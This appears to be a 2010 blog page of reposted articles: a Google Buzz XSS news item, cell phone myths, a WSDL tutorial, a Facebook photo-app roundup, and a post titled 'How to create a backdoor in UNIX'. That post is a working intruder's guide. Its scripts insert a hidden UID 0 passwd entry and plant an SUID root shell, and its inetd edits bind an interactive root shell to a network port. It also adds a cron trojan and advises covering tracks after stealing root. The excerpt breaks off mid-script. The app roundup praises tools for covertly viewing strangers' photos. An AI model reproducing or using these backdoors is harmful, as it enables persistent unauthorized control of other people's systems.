Saturday, February 20, 2010

XSS IN GOOGLE BUZZ

You may or may not have noticed, but I was on hiatus for a few days. As you’re probably aware (and I’m sure many of you celebrate) it was Chinese New Year on February 14th so I was offline for a few days taking a well deserved break.

I’d like to wish all of you that celebrate it a Happy Chinese New Year.

Anyway the big news during this period, especially in the whole social networking scene has been Google Buzz. Is the next challenger to Twitter or Friendfeed or even Facebook? Personally I think not, but it sure has got people talking.

Google has fixed a cross-site scripting bug that allowed attackers to take control of Google Buzz accounts. The bug affects the mobile version of Buzz and was reported Feb. 16 by SecTheory CEO Robert Hansen. Google patched the vulnerability the same day. According to Hansen, news of the flaw was passed along to him by a hacker with the moniker of TrainReq.

“There [are] four things of note here,” Hansen blogged. “Firstly, it’s on Google’s domain, not some other domain like Google Gadgets or something. So, yes, it’s bad for phishing and for cookies. Secondly, it’s over SSL/TLS [Secure Sockets Layer/Transport Layer Security] (so no one should be able to see what’s going on, right?). Third, it could be used to hijack Google Buzz—as if anyone is using that product (or at least you shouldn’t be). And lastly, isn’t it ironic that Google is asking to know where I am on the very same page that’s being compromised?”

The news from the last few days included a cross site scripting flaw in the mobile version of Google Buzz.

It was fixed promptly because the guy that discovered it was kind enough to tell Google about it.

As always though if something was discovered so quickly and reported so quickly how many more flaws are there being used by the bad guys out there.

Hansen was referring to the location feature in Buzz that shows where Buzz users are when they post. This feature can be turned off by the user.

“We have no indication that the vulnerability was actively abused,” a Google spokesperson said. “We understand the importance of our users’ security, and we are committed to further improving the security of Google Buzz.”

In the week since Buzz was launched Feb. 9, Google has faced criticism over privacy issues associated with the service. On Feb. 16, the Electronic Privacy Information Center filed a complaint with the Federal Trade Commission that charged Google with failing to protect users’ privacy. In an interview with eWEEK, Google Vice President of Product Management Bradley Horowitz said the company did not expect the negative response that Google Buzz received on the privacy issue.

There was also a big outcry about privacy when Buzz was launched due the fact it automatically populates your following list with people you often converse with.

Imagine if you’d been hunting for a new job and talking to someone from a competitor and your boss saw it? Or a husband chatting with another woman and his wife saw who he was ‘following’? There are a lot of permutations, all of which are not good so use your imagination.

eWeek also did another article about the privacy concerns here – Buzz Privacy Backlash.

Source: eWeek

Friday, February 19, 2010

lucky or Unlucky??????????/

Cell phone Myths

The internet is rife with rumors about the miracles of cellular technology, as well as the dangers.  Depending on who you believe you may be carrying around a miracle tool or a death trap in your pants and Lord knows that’s a lot of stress for one person to deal with.  Best to get to the bottom of things and separate truth from fiction.

1. Your cell phone can unlock your car
No one seems to know where this story came from, but it’s been circulated in a number of emails.  The basic idea is that you’re out and about and in your frenzy to get things done, you lock your keys in the car.  Crap.  But, being clever and knowing you have a spare set complete with keyless entry at home, you call home and have someone press the button on your spare set to unlock your car over the phone.  The signal goes through the phone, to your car and you’re driving again.  Now that’s crafty.
http://www.youtube.com/watch?v=0bjQMzI9m5w
So popular is this myth that the Mythbusters themselves had to test it.  Guess what they discovered… you’re going to be pointing your phone at your car for a long, long time.
The problem is the phone uses an audio frequency while your keyless entry is on a much higher radio frequency.  Which is to say you’re dealing with apples and oranges and once that keyless frequency hits your cell phone, it’s not going to get translated through to the other side at the same frequency.  So no, you can’t unlock your car with your cell phone, unless you plan on using it to break a window.

2. Cell phones cause gas pump explosions
This winner has become so ingrained in our minds that gas stations actually have signs asking you to not use your phone while at the pumps for fear of a massive fireball of death and destruction, all because you needed to say goodnight to grandma.  But when’s the last time you saw this happen on the news?
As it turns out, in the entire history of the entire world, there has never been an incident where someone blew themselves or any gas stations up with a cell phone.  It’s a complete fabrication.
According to Snopes, the story just showed up one day in 1999.  And every time it got mentioned, they said the explosion happened somewhere else.  So basically it’s a friend of a friend story, only in this case the friend is an explosion, and no one’s ever seen it in person.
The Cellular Telecommunications Industry Association and the American Petroleum Institute both agree that phones just don’t blow things up and they’ve never seen any evidence to suggest they do.  Any news reports that have attributed fires to the use of phones were later proved false when someone, you know, actually looked for the real cause.

3. Cell phones cause deaths in hospitals
Similar to no phones at the gas pumps, most hospitals have signs in place telling you to turn off your phone.  While some have phone use in designated areas which us regular folks assume must be lead shielded rooms or some such, other hospitals ban them altogether.  The fear is that cell phone signals may interfere with the machines being used to keep people alive.  There are even reports that the use of cell phones in hospitals has been a contributing factor in the death or serious injury to patients as a result of machines malfunctioning, delivering incorrect amounts of medication and so on.
However, the FDA has no information whatsoever on cell phones causing any deaths in hospitals the FDA has no information whatsoever on cell phones causing any deaths in hospitals, nor has any medical journal mentioned it.  Reports that cell phone interference has caused incubators, heart monitors and IV pumps to go all wonky are the main cause behind the cell phone bans in hospitals, however the evidence for these is also sketchy.  Just what is it that would cause the problem, anyway?
In 2007, the Mayo Clinic decided to do a study to see what the effect of cell phone interference was, so they used phones near 200 different pieces of hospital equipment.  The end result was that the observed no clinically important interference at all.
So are you safe using a phone in a hospital?  Probably, just keep in mind that if they have signs up and you refuse to put the phone away, they can and will have security take you out.  In 1998, a man in Massachusetts was pepper sprayed for not hanging up.  Probably best just to leave a message and call back later.

4. Cell phones cause cancer
This is the biggest one you’re going to find online with the most confusing answers.  There are literally hundreds, if not thousands, of websites that will assure you that cell phone use leads to brain tumors.
Dr Vini Khurana, a reputable neurosurgeon who trained at the Mayo Clinic, even wrote a paper back in 2008 that said cell phone usage caused more cancer than smoking or asbestos.  If you just said “holy crap” you’re well within you’re rights, as that’s a pretty damning statement.  But there is a but.
According to the World Heath Organization, and more than 30 other scientific reviews, cell phones do not pose a cancer risk.  And, apparently, Dr. Khurana’s work had not even been peer reviewed when it was released.
In a nutshell, cancer is caused by DNA mutations.  Some kind of radiation or chemical has to break down chemical bonds in our cells that lead to mutation.  But the radiation from a cell phone, the electromagnetic kind which is released by all kinds of electronics, is not strong enough to strip away electrons or break down chemical bonds, at least according to most scientists.  So cell phones just physically can’t cause cancer.   But why do people think they do?
Nearly every study on the link between cancer and cell phone use takes the time to point out that will no link is found, the risk of long term use requires further study.  Meaning that we found nothing, but if we kept going for a few years, maybe we would.  And leaving the door open like that has let people who are primed and ready to panic over their ear growing a second head walk right in.

5. Your cell phone can set you on Fire
Probably one of the last things you want your phone to do is spontaneously combust, especially if it’s in your pocket or, you know, against your head.  For the most part we like to think there are hard working men and woman out there ensuring that the products we use from day to day just don’t do that.  And while most things are pretty safe, very few things are 100%
Back in 2004, a teen in California was walking with her phone in her back pocket when, as witnesses say, it made a woosh sound, bulged a little, then spewed forth fist-sized flames.  The girl suffered 2nd degree burns.
So how could such a nutty thing happen?  An overheated battery.  Kyocera issues a recall of 140,000 batteries and the Consumer Product Safety Commission has issued recalls as well for certain batteries that can short circuit, overheat and, yes, burst into flame.
There have been other reported incident of phones bursting into flames while charging as well and though it’s rare, it actually can happen, though it seems to have been the result of poor quality batteries more than your phone angry at the poor grammar used in texting as you might think

6. Your phone can spy on you
This one has been a favorite of conspiracy nuts for the last few years, the idea that the government can tap into your phone and use it to track your whereabouts, or ever turn on the microphone and listen in on your conversations, whether or not you’re using the phone at that moment.
In fact, it’s true that the FBI has used this technique, calling “roving bug” to eavesdrop on criminals, like in New York when it was used as a surveillance tool in an organized crime investigation.  Traditional wire tapping of land lines is a bit too old school and criminals are on to it, so the FBI had to adapt.  Since many phones will never fully power down unless the battery is totally removed, a cell phone is a perfect wireless transmitter for law enforcement to tap into, and it still falls under the purview of existing wiretapping laws.
In other cases, though judges are have batted the attempts down due to a lack of probably cause, law enforcement has attempted to get access to information about cell phone use – locations of cell towers that took calls from individuals, strength and angle of signal and timing of calls, which would allow them to approximate the location of an individual.  You’ve seen it in television and movies before and, for all intents and purposes, it’s fairly accurate.  With access to cell company records, you could be tracked in real time based on your cell phone usage, or even just having the phone on and in your possession.

7. Your cell phone can explode
If you’re the kind of person who figures a cell phone fire is no big deal, you may be more inclined to be slightly nervous of cell phone explosions.  After all, fire can be our friend and let us roast weenies and such.  Explosions just suck, by and large.
Back in 2007, word came out of Korea that a man who had his cell phone in his shirt pocket died when the phone blew up, sending shrapnel into his heart and lungs.  Last year in China, a man died shortly after changing his phone battery when the same thing happened.  It was the 9th recorded phone explosion in the country over a seven year period.
In one incident, a man working in an iron mill died when it was determined that the heat of the mill caused the liquid in the battery to overheat and blow up.  So it may be rare, but it can happen.  Let that be a lesson to you, never expose your phone to molten metal.

8. Cell phones cause infertility
Potentially the most horrible rumor of all, at least for some people, is the one that says cell phones lower your sperm count.  And apparently it’s true.
Research conducted at the Center for Reproductive Medicine at the Glickman Urological and Kidney Institute at the Cleveland Clinic in Ohio suggests that there’s a chance using a cell phone is bad news for your boys if you’re the hands free type who keeps the phone in your pocket. Long term exposure to all that electromagnetic radiation so close to the goods may lead to an increase in body temperature.  And that can effect sperm count as well as mobility and shape.
The jury’s not out, of course, and odds are you need to be doing a lot of talking with the phone in your pocket, but probably to be on the safe side you could keep the phone over a couple of inches or two.  You never know

Tuesday, February 16, 2010

INTRODUCTION TO WSDL

In the past few years, a number of standards proposals have emerged in the past few years to provide a key piece of the XML middleware story: networked service requests. These networked service requests are a way to request XML-related functionality from a remote machine over a network such as the Internet.)

This has led to a standards race including notable entries such as Allaire Corp's Web Distributed Data eXchange (WDDX) (see Resources), UserLand Inc's XML Remote Procedure Call (XML-RPC), Microsoft's Simple Object Access Protocol (SOAP) by David Winer, IBM, Microsoft, and others (see Resources). At the same time, some developers have even done quite well building applications over plain old HTTP. The biggest growth area for such XML-based networked services have been in content exchange and syndication.

Similarly, there have also been a number of proposals for defining the descriptions and structure of such content. Of these, the notable ones include Information Content Exchange (ICE) from Vignette Corp and its partners (see Resources), and the RDF (Resource Description Framework) Site Summary (RSS) from Netscape and its partners (see Resources). Many developers have also done very well using the common Internet standard of Multipurpose Internet Messaging Extensions (MIME).

There are many, many other XML protocol initiatives out there; enough so that the W3C's has a brand new XML Protocol Working Group just for addressing these issues (see Resources). It should be very interesting to watch the political sparks fly as the W3C tries to extract something coherent from this welter.

In this bewildering array of ways to communicate between Web applications, a clear need has emerged for a mechanism to describe XML-based network services regardless of communications protocol and request structure. With such a mechanism many advanced Web development tasks could gain an additional measure of automation. For example:

  • Portal toolkits could provide a plug-in system for content sections to make it easier for designers to pick from a wide range of on-line services without delving into a lot of technical details.
  • Industry groups and service brokers could publish comprehensive white pages and yellow pages of on-line XML services, allowing developers to make quick technological assessments and comparisons.
  • Service providers could quickly publish updates and versions of their request structures in a standard format to help automate adoption by developers.

IBM, Ariba, and Microsoft set out to craft just such a mechanism, and on September 25th emerged with the Web Services Description Language (WSDL) version 1.0 (see Resources). It is rather odd that this "1.0" spec was pretty much under wraps until then; thus the XML community was left with no chance at a public review before the release date. At any rate, WSDL is a format for describing networked XML services, filling a large portion of the need I described earlier.

Background

WSDL occupies a space with many of its precedents overlapping some of the specifications. Let's take a brief look at the menagerie to provide some background. WebMethods' Web Interface Definition Language (WIDL), one of the pioneering specifications for description of remote Web services, was an XML format that took familiar approach (which was accessing functionality on a remote machine as if it were on a local machine) to users of remote procedural technologies, such as RPC and CORBA. There was some fit between WIDL and the XML-RPC system by UserLand. The former has since faded away, as message-based XML technologies have proven more popular than their procedural equivalents. The latter seems to be giving way to SOAP, which has support for message-oriented as well as procedural approaches.

SOAP describes envelope and message formats, and has a basic request/response handshake protocol. Additionally, Microsoft developed the SOAP Contract Language (SCL) earlier this year to provide a system for on-line service descriptions for SOAP-based applications. This work in SCL, in addition to other protocols and related work from IBM and Ariba, has pretty much been phased into WSDL.

Just before WSDL emerged, a consortium of 36 companies, including IBM, Ariba, and Microsoft, launched the Universal Description, Discovery and Integration (UDDI) system (see Resources), an initiative to provide a standard directory of on-line business services with an elaborate API for querying the directories and service providers.

Microsoft kept itself busy in the area of Web services description before WSDL emerged. It had created another entrant, Discovery of Web Services (DISCO) (see Resources), which is in now in limbo, outside Microsoft's official .NET strategic plan. DISCO describes how to find ("discover") SCL descriptions of services for a particular requirements. Frankly, reading the DISCO spec, it is hard to make heads or tails of the value it was supposed to provide, but whatever it had of use has since been sprinkled into UDDI and WSDL.

Parallel to Microsoft's efforts on SCL, IBM was creating the Network Accessible Service Specification Language (NASSL) (see Resources). One can also see that IBM threw its ideas fully into WSDL, and certainly its NASSL editors. IBM also got into the services discovery act with their Advertisement and Discovery of Services (ADS). There doesn't appear to have ever been a formal specification of ADS, though the Web Services Toolkit from IBM's alphaWorks project has a reference implementation of it (see Resources).

If you are thoroughly confused by now, you're in good company. More than one wag has quipped that XML is a specification with no other use but to spawn scads of other specifications. The formation of the UDDI group is supposed to help in the area of service description. Out of the current spaghetti should emerge a simple order, creating an overall protocol for deployment of Web-based services. This will probably be in the form of separate but linked formats for service discovery, description, request/response protocol, request structure and data-typing, semantic discovery, and, of course, transport protocol. Figure 1offers a suggested diagram representing this order and placing the various specifications I've mentioned accordingly. Hopefully, it will help clear up the landscape. Within this picture, WSDL handles the specific purpose of a description mechanism for services.


Figure 1. Service roles and interactions
Fig 1. Service roles and interactions

Sample WSDL document

Let's look at how WSDL works with SOAP through the following example. Let us say we are the entrepreneurs behind the imaginary company snowboard-info.com, an intrepid snowboarding industry database providing a service that allows others to query endorsements from snowboard manufacturers. A client can send a request to retrieve this information from a server using a SOAP request like the one in Listing 1. In natural language, Listing 1 encapsulates the question "Which professional snowboarder endorses the K2 FatBob?"


Listing 1. A SOAP 1.1 Request
<span>
POST /EndorsementSearch HTTP/1.1
Host: <a class="linkclass" href="http://www.snowboard-info.com/" style="color: rgb(76, 110, 148);">www.snowboard-info.com</a>
Content-Type: text/xml; charset="utf-8"
Content-Length: 261
SOAPAction: "<a class="linkclass" href="http://www.snowboard-info.com/EndorsementSearch" style="color: rgb(76, 110, 148);">http://www.snowboard-info.com/EndorsementSearch</a>"
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="<a class="linkclass" href="http://schemas.xmlsoap.org/soap/envelope/" style="color: rgb(76, 110, 148);">http://schemas.xmlsoap.org/soap/envelope/</a>"
SOAP-ENV:encodingStyle="<a class="linkclass" href="http://schemas.xmlsoap.org/soap/encoding/" style="color: rgb(76, 110, 148);">http://schemas.xmlsoap.org/soap/encoding/</a>">
<SOAP-ENV:Body>
<m:GetEndorsingBoarder xmlns:m="<a class="linkclass" href="http://namespaces.snowboard-info.com/" style="color: rgb(76, 110, 148);">http://namespaces.snowboard-info.com</a>">
<manufacturer>K2</manufacturer>
<model>Fatbob</model>
</m:GetEndorsingBoarder>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
</span>

In response, the server can send the SOAP 1.1 response (sans HTTP header) message for the foregoing request as shown inListing 2. In natural language, it encapsulates the simple string response "Chris Englesmann".


Listing 2. A SOAP 1.1 Response
<span><br /><SOAP-ENV:Envelope<br />  xmlns:SOAP-ENV="<a class="linkclass" href="http://schemas.xmlsoap.org/soap/envelope/" style="color: rgb(76, 110, 148);">http://schemas.xmlsoap.org/soap/envelope/</a>"<br />  SOAP-ENV:encodingStyle="<a class="linkclass" href="http://schemas.xmlsoap.org/soap/encoding/" style="color: rgb(76, 110, 148);">http://schemas.xmlsoap.org/soap/encoding/</a>"><br />  <SOAP-ENV:Body><br />    <m:GetEndorsingBoarderResponse xmlns:m="<a class="linkclass" href="http://namespaces.snowboard-info.com/" style="color: rgb(76, 110, 148);">http://namespaces.snowboard-info.com</a>"><br />      <endorsingBoarder>Chris Englesmann</endorsingBoarder><br />    </m:GetEndorsingBoarderResponse><br />  </SOAP-ENV:Body><br /></SOAP-ENV:Envelope></span>

Now the overall structure of requests, the relevant data types, the schema of the XML elements used, and other such matter are left to the trading partners by the SOAP specification itself. WSDL provides a standard for service specification that unites the types of requests and the requirements needed to process them.

In order to get all the hot snowboarding portals and discussion sites hooked up to our system, we might want to define WSDL communications ports. We do so by releasing the WSDL description of our point of service as shown in Listing 3. A WSDL description for a Snowboarding endorsement query

First, a bit of reassurance. Listing 3 may seem long, but WSDL is actually quite simple. Our sample WSDL document not only uses nearly every facet of WSDL, it also has a hefty chunk of XML Schema and also takes advantage of the SOAP binding to WSDL. This last portion, though presented in the same service description, is technically an extension to the standard service description.

The whole thing is enclosed in the  element that describes a set of related services. The element allows the specification of low-level data-typing for the message or procedure contents. Different mechanisms are permitted through namespace extensibility, but XML schemas are likely to be the choice for most users, and is used in our example. This specifies a simple element content model that you can see matches the sample exchange in Listing 1 and Listing 2. WSDL provides a system for importing data-type specifications located as separate resources, and there could be several such resources in cases of complex messages in multiple usage domains.

The  element defines the data format of each individual transmission in the communication. In our case, one message represents the EndorsingBoarder request and the other the response. In our example, this is a simple statement that the body of the message is a particular element from the schema in the types section. The breaking of a transmission into message parts depends on the logical view of the data. For instance, if the transmission is a remote procedure call, the message might be divided into multiple parts, one of which is the procedure name and meta-data and the rest of which are the procedure parameters. There is naturally a relationship between the granularity of the data-typing and the break-down of the message into parts.

The element groups messages that form a single logical operation. For instance, in our case, we can have anEndorsingBoarder request which triggers an EndorsingBoarder response, or in case of error or exception, anEndorsingBoarderFault. This particular exchange is grouped together into a WSDL port type. As you can see, the relationship to messages is made by qualified name reference.

There are only four forms of operations with built-in support in WSDL: one-way, request-response, solicit-response, andnotification. The latter two are simply the "inverse" of the first two, the only difference being whether the end point in question is on the receiving or sending end of the initial message. Basically, WSDL supports unidirectional (one-way and notification) and bidirectional (request-response and solicit-response) port types. Faults are only supported in the bidirectional port types, unlike the CORBA model -- I'll leave the inevitable controversy between the two approaches right there for now.

The WSDL document so far has moved from the concrete and physical (data typing) to the abstract and logical (messages and port types), with some reference between the two. The  element is the bit that firmly provides the connection between logical and physical model. In this case, it takes the operation we have defined through the abstract port type and connects it to a concrete description of how it is transmitted through SOAP. Here is where we come to the SOAP extensions to WSDL I mentioned earlier. WSDL also provides bindings to bare-metal HTTP and MIME, and full extensibility to other protocols.

Our sample binding specifies the GetEndorsingBoarderPortType as having the SOAP "style" of Document. The style can beRPC or Document, the former indicating a more procedural bent to the communication and the latter a message-exchange direction. Of course, the dividing line between these is quite broad, and I can imagine much fruitless discussion over whether a given port type is one or the other. My bias in this debate is to use Document nearly everywhere.

Our binding also specifies the network transport as HTTP -- SOAP can be transmitted by other means, such as SMTP. The  elements get down to the grit, mapping the individual messages in the port type to definition of the SOAP transmissions that actuate them. Note that we specify a SoapAction, which is required for SOAP over HTTP. The given value must be used in the HTTP headers of the actual messages in order to signal the "intent" of the message. This will supposedly allow intelligent proxying and firewalling of SOAP traffic some day.

The final element, , defines a physical location for a communication end-point. It uses the port type and binding specified earlier, and basically gives the Web address or URI for a particular provider of the described service. Naturally, in our example, it is the address where we have set up our SOAP server to traffic in snowboard product endorsement queries.

However, what if once having launched the service, it turned out to be a hit with users, and traffic begins to overwhelm our server? We might decide to set up a mirror, perhaps in Europe. In this case, the service is exactly the same, but we provide a separate URI from which it can be obtained. In the WSDL scheme of things, all we'd have to do to make this happen is modify our WSDL document to add another  element such as in Listing 4.


Listing 4. An alternative element for handling multiple sites.
<span><br /><service name="EndorsementSearchEuropeanService"><br />   <documentation>snowboarding-info.com Endorsement Service European<br />      Mirror</documentation> <br />   <port name="GetEndorsingBoarderPort"<br />      binding="es:EndorsementSearchSoapBinding"><br />      <soap:address location="<a class="linkclass" href="http://www.snowboard-info.co.uk/EndorsementSearch" style="color: rgb(76, 110, 148);">http://www.snowboard-info.co.uk/EndorsementSearch</a>"/><br />   </port><br /></service></span>

Notice the different service name and address. Now any users who find this WSDL document through whatever means of service discovery will have two options for where to make the actual request.

A few general comments on our WSDL example. You can see that WSDL leans heavily on XML namespaces. The XML namespaces given in the <definition> element's targetNameSpace attribute is by default attached to all the names used for the other top-level WSDL elements. Developers can use qualified names to refer to these elements using prefixes from the particular namespace declarations in scope. Note that the default namespaces are not applied to un-prefixed names within WSDL attributes. This is consistent with other places where the XML namespaces mechanism has been borrowed for use in disambiguating names in the character data of XML specifications. XML namespaces are also used to connect WSDL elements (and elements from binding extensions) to the data-typing provided in the <types> element. In our example, we use the default namespace, http://schemas.xmlsoap.org/wsdl/ to indicate the official elements of WSDL. However, the spec explicitly leaves wide open the option of extending the core elements using elements in other namespaces.

Overall this example is quite simple. It describes communication consisting of short SOAP transmissions, with two input strings and one output in each operation. WSDL could just as easily define multiple port types consisting of a myriad of messages that use the full, extraordinary range of XML Schemas. Then again, at least in the short term, more simple communications between XML service providers and users is more likely to succeed.



Monday, February 15, 2010

Applications for photos in Facebook

Facebook photo tools

Photo Album Strip Photo Album Strip is a great app. After you install it on your profile, it will allow you to change the designations for your albums to anything you want. You can also change their colors, reduce the number of picture categories, or hide those that you don't want your friends to see. It's an extremely simple app, but it works well and it's one of the more convenient apps in this roundup. It's definitely worth trying out.

Photo Album Strip

Photo Album Strip gives you some ideas for photo album categories.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Box Photo Box is similar to Flickr. It allows you to tag your photos and share those with friends. You can also arrange them based on the topic of the photos. But perhaps the most appealing aspect of Photo Box is that it tracks how many people have viewed your images. That should give you some insight into what your friends like. Overall, Photo Box is a pretty simple app, but it's worth trying out.

Photo Box

Photo Box brings Flickr-like features to Facebook.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Finder Photo Finder is a neat service that, so far, is in private alpha. Instead of forcing you to talk to friends to be tagged in photos, Photo Finder does it for you. It analyzes all the photos on Facebook to see if you're in them. If so, it displays the photos and which profile they're on.

Unfortunately, Photo Finder is still a work in progress. It failed to find pictures of me or my wife even though I intentionally "untagged" images. That said, it did find a couple of pictures of my friend when I asked him to use the app. So, for right now, your mileage will vary with Photo Finder. But it's still a neat app.

Photo Finder

Photo Finder couldn't find pictures of me on Facebook.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Mosaic Photo Mosaic will allow you to create an image out of all your Facebook photos. You'll need 50 photos to do that, but as long as you have them, you'll create some really neat images. I'm not too sure how useful Photo Mosaic is, though. It's a great app to have on-hand whenever you want to create a neat picture, but for the most part, it's a novelty that you probably won't find yourself using too often. Regardless, it's worth checking out.

Photo Mosaic

Photo Mosaic helps you create a mosaic in three steps.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Stalker If it frustrates you that you can't see other users' images unless you're friends with them, Photo Stalker is for you. After installing it, the app lets you view any photo on Facebook without the user knowing it.

After using it, I wasn't too impressed by Photo Stalker. It does work and using it couldn't be easier, but the interface is suspect. I had trouble accessing profile pictures unless I had the Facebook ID used as the query. Although it worked as advertised, it was a little frustrating to use.

Photo Stalker

Photo Stalker lets you see photos of Facebook users you're not friends with.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Surfer Photo Surfer is the best anonymous photo viewer I've used on Facebook. Unlike Photo Stalker, Photo Surfer makes it quick and easy to find the photos you're looking for.

After it's installed, all of your friends' profiles are listed. When you click on one of those profiles, you can see all their photos. If you're looking to see photos from those you aren't friends with, the app's search feature is second to none. It found everyone I searched for. It was fantastic. That said, pictures that users have set to private can't be viewed. Regardless, it's a great app that you should definitely try out.

Photo Surfer

Photo Surfer lets you see what others' photos look like.

(Credit: Screenshot by Don Reisinger/CNET)

Private Photo Gallery Private Photo Gallery is a useful app if you don't want users to see your Facebook photos. But with so many ads, it can be quite annoying.

When you first start using Private Photo Gallery, you have to choose which friends will be allowed to see your photos. After that, the service will block photo viewing from the rest of your friends. Each day, you can allow up to 10 friends who request to see your photos access to them. After you exceed that 10-person limit, you can either choose to wait until tomorrow to accept more requests or upgrade to a premium account, which costs $5.99 per month. It allows for unlimited request acceptance, no ads, and an unlimited number of pictures you can keep private. It's expensive, but given the sheer number of ads in the free version, it might be worth it if you like this app enough. If not, stick with the free version.

Private Photo Gallery

Private Photo Gallery has a lot of ads.

(Credit: Screenshot by Don Reisinger/CNET)


Sunday, February 14, 2010

HOW TO CREATE A BACKDOOR IN UNIX

Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading

now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field

format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those

robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If

you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a

nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...



The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and

skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the

admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time

to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be

looking for back doors.







The Overt



[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It

flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply

prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...



#!/bin/csh

# Inserts a UID 0 account into the middle of the passwd file.

# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.

# daemon9@netcom.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it



set linecount = `wc -l /etc/passwd`

cd # Do this at home.

cp /etc/passwd ./temppass # Safety first.

echo passwd file has $linecount[1] lines.

@ linecount[1] /= 2

@ linecount[1] += 1 # we only want 2 temp files

echo Creating two files, $linecount[1] lines each \(or approximately that\).

split -$linecount[1] ./temppass # passwd string optional

echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa

cat ./xab >> ./xaa

mv ./xaa /etc/passwd

chmod 644 /etc/passwd # or whatever it was beforehand

rm ./xa* ./temppass

echo Done...



NEVER, EVER, change the root password. The reasons are obvious.



[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the

passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second

field).



[3] Leave an SUID root shell in /tmp.



#!/bin/sh

# Everyone's favorite...



cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that...

chmod 4755 /tmp/.evilnaughtyshell



Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted

to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may

notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system

specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.







The Veiled



[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some

background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the

appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical

lines look like this:



(1) (2) (3) (4) (5) (6) (7)

ftp stream tcp nowait root /usr/etc/ftpd ftpd

talk dgram udp wait root /usr/etc/ntalkd ntalkd



Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine

which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.

TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP

or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will

process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a

child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more

inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual

command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.

This is done with an 'internal' flag in fields (6) and (7).

So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it

with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd

file, etc...

For the insinuation-impaired, try this:



Open the /etc/inetd.conf in an available editor. Find the line that reads:





daytime stream tcp nowait root internal



and change it to:



daytime stream tcp nowait /bin/sh sh -i.



You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and

restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea

to do this off peak hours).



[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One

simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in

/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:



(1) (2)/(3) (4)

smtp 25/tcp mail



Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name

associated with the service. For instance, add this line to /etc/services:



evil 22/tcp evil



and this line to /etc/inetd.conf:



evil stream tcp nowait /bin/sh sh -i



Restart inetd as before.



Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,

they offer rentry from *any* account on *any* computer on the Internet.



[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's

crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this

backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have

several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.

It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,

or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab

entry has six fields:



(1) (2) (3) (4) (5) (6)

0 0 * * 1 /usr/bin/updatedb



Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week

(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,

simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the

/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not

be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your

shady intentions). Add this line to /var/spool/crontab/root:



0 0 * * * /usr/bin/trojancode



This is the shell script:



#!/bin/csh

# Is our eviluser still on the system? Let's make sure he is.

# daemon9@netcom.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it



